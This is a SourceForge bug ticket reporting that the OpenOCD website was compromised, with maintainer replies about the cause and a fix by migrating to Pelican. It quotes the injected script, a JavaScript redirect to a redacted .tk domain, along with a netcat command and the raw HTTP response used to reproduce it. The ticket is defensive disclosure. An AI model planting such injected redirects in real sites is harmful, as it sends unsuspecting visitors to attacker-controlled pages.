Menu
▾
▴
#313 Website Compromised
Looks like your website was compromised. Someone has injected the following into the HTML returned on /getting-openocd/
<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237");window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
to reproduce:
$ echo -ne "GET /getting-openocd/ HTTP/1.1\nHost: openocd.org\n\n" | nc openocd.org 80 | head -n 20
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 Aug 2021 00:34:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Host
X-Pingback: http://openocd.org/web/xmlrpc.php
Set-Cookie: ht_rr=1; expires=Wed, 04-Aug-2021 00:34:44 GMT; path=/
Cache-Control: max-age=3600
Expires: Tue, 03 Aug 2021 01:34:42 GMT
X-From: sfp-web-3
Vary: Accept-Encoding
ce1
<script>window.location.replace("https://REDACTED_FOR_SECURITY.tk/help/?15131619432237");window.location.href = "https://REDACTED_FOR_SECURITY.tk/help/?15131619432237";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
Hello,
On Tue, Aug 03, 2021 at 12:40:00AM -0000, sbruton@users.sourceforge.net wrote:
Thank you for reporting. I wonder if it's SF.net compromise because
apparently it "resolved itself" and now the page is clean again?
--
Be free, use free (http://www.gnu.org/philosophy/free-sw.html) software!
mailto:fercerpav@gmail.com
Thank you! Should be fixed by migrating to Pelican now.